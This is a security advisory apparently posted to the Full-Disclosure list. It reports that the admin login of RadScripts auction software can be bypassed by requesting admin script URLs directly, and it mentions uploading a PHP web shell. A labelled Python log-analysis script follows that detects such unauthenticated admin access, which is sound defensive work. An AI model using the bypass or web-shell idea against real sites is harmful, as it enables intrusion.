Products: RadBids Gold, RadLance Gold, RadNics Gold auction products
Vendor: RadScripts
VULNERABILITY CLASS: Admin login bypass
[Product Description]
RadBids was designed to give you all the tools needed to rapidly deploy an ebay style auction web site solution. Our php auction software is simple to deploy and easy to manage. From a web-based administrative panel one can manage all aspects of the auction software including categories, users, financial transactions and every aspect of the auction software with a few clicks of the mouse.
[Summary]
An attacker can bypass the RadScripts Auction Software admin login by entering the direct URL of the admin scripts.
[Exploit]
This can be used to overwrite any file on the server that has write permissions on it, for example to upload one's own PHP web shell.
[Credits]
INVENT
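
Added example, not part of the original advisory or of RadScripts code: a log check for the behaviour described in the Summary, flagging admin scripts that were served to a client which never completed a login. The /admin/ layout, the login.php name, the 302-on-success convention and the use of the client IP as a stand-in for a session are assumptions.

```python
import re

# Assumptions (not from the advisory): admin scripts live under /admin/,
# the login form is /admin/login.php, and a successful login answers 302.
ADMIN_PREFIX = "/admin/"
LOGIN_PATH = "/admin/login.php"

# Common/combined access-log format: client ip, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_direct_admin_hits(lines):
    """Return (ip, method, path) for admin scripts served with 2xx to a
    client that had not completed a login earlier in the log."""
    logged_in = set()
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line, skip it
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if not path.startswith(ADMIN_PREFIX):
            continue
        if path == LOGIN_PATH:
            if method == "POST" and status == 302:
                logged_in.add(ip)  # login accepted for this client
            continue
        if 200 <= status < 300 and ip not in logged_in:
            hits.append((ip, method, path))
    return hits

# Constructed sample log (documentation addresses, hypothetical script names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /admin/login.php HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "POST /admin/login.php HTTP/1.1" 302 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:10 +0000] "GET /admin/users.php HTTP/1.1" 200 4031',
    '203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /admin/categories.php?id=1 HTTP/1.1" 200 2290',
    '203.0.113.5 - - [01/Jan/2024:10:02:05 +0000] "POST /admin/users.php HTTP/1.1" 200 120',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /admin/users.php HTTP/1.1" 302 0',
    '203.0.113.5 - - [01/Jan/2024:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in find_direct_admin_hits(SAMPLE_LOG):
        print("admin script served without prior login:", *hit)
```

Clients behind a shared address can hide a hit; where the session cookie is logged, correlating on it instead of the IP is stricter.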
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
